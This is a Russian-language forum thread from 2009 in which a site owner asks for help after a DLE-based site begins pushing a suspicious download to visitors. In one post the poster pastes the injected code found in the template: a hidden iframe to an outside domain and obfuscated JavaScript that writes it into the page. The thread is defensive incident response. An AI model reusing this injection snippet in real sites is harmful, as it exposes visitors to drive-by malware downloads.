|
Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Наверно вирус или троян на сайте |
|
Наверно вирус или троян на сайте
|
Пользователь Сообщения: 146 |
Профиль | Отправить PM | Цитировать Добрый день!
хотел с вами посоветоваться... у знакомого есть есть сайт при заходе на сайте менеджер закачек пытается сразу сам загрузить вот этот файл (осторожно может это вирус) кто может проверить что это за файл и что мне посоветовать админу того сайта, где искать этот вредный скрипт который вызывает загрузку файла? (сайт работает на движке ДЛЕ) |
|
Отправлено: 14:30, 22-09-2009 |
Модератор Сообщения: 16839
|
Профиль | Сайт | Отправить PM | Цитировать Результат проверки на Virustotal.com Файл открылся - ничего особенного - эмблема FireFox
|
------- Отправлено: 15:46, 22-09-2009 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
DOOMer Сообщения: 3254
|
Профиль | Отправить PM | Цитировать Цитата okshef:
Зачем сайт старательно пытается этот PDF втюхать? |
|
------- Отправлено: 15:58, 22-09-2009 | #3 |
Модератор Сообщения: 16839
|
Профиль | Сайт | Отправить PM | Цитировать А как он должен был сработать? Единственное, на что обратил внимание - задержка при открытии. Буду благодарен за пояснения, но в Гугл посылать не надо
P.S. Отправил на анализ в ESET |
------- Отправлено: 16:10, 22-09-2009 | #4 |
Ветеран Сообщения: 764
|
Профиль | Сайт | Отправить PM | Цитировать AACC, а сайт куда дели?
To change this page, upload your website into the public_html directory okshef, надеюсь на виртуалке открывал? liveinternetru.net/stat - тут три скрипта загрузчика. http://www.virustotal.com/ru/analisi...a25-1253623057 Кстати по одному и тому же IP скачивать не дает больше одного раза. Все(включая раскладку по сайту) уплывает в еще несколько вирлабов. |
|
Отправлено: 16:45, 22-09-2009 | #5 |
Пользователь Сообщения: 146
|
Профиль | Отправить PM | Цитировать Цитата akok:
Цитата:
оказывается код лежал перед </body> в файле main.tpl <iframe src = "http://liveinternetru.net/stat/index.php" width=1 height=1 style="visibility:hidden"> <textarea id=GhLzcEK style="display:none">%3Ciframe src %3D %22http%3A%2F%2Fliveinternetru.net%2Fstat%2Findex.php%22 width%3D1 height%3D1 style%3D%22visibility%3Ahidden%22%3E</textarea><script>function KHCSXGjE(jEddBy){ fff=op.split("66");alert('FGpjimOxT'); } var BMKbDt=document;document['wr1ite'.replace(/[0-9]/,'')](unescape(document.getElementById('GhLzcEK').value));function VszbxFSJ(LWznyDzk){ fff.op.replace("v");var fApzn=new Function("QiZ", "return 912451;"); } </script> вопрос, как можно такое засунуть? и как нужно от такого предохранять сайт? |
||
Отправлено: 00:27, 23-09-2009 | #6 |
Ветеран Сообщения: 764
|
Профиль | Сайт | Отправить PM | Цитировать AACC, получив пароли от админа или хостера.
|
Отправлено: 13:45, 23-09-2009 | #7 |
Участник сейчас на форуме | Участник вне форума | Автор темы | Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
[решено] Вирус на сайте. (с) Касперский | Artem-Samsung | Вебмастеру | 8 | 27-02-2009 23:02 | |
Вирус(троян) отсылает письма | rivera | Лечение систем от вредоносных программ | 5 | 26-01-2009 09:58 | |
Вопрос - ujqxjh.exe - вирус, троян, как избавится? | wiser | Лечение систем от вредоносных программ | 1 | 27-10-2008 15:57 | |
Вирус MicrSoft (троян) | Kostic_131 | Лечение систем от вредоносных программ | 6 | 28-05-2008 11:42 |
|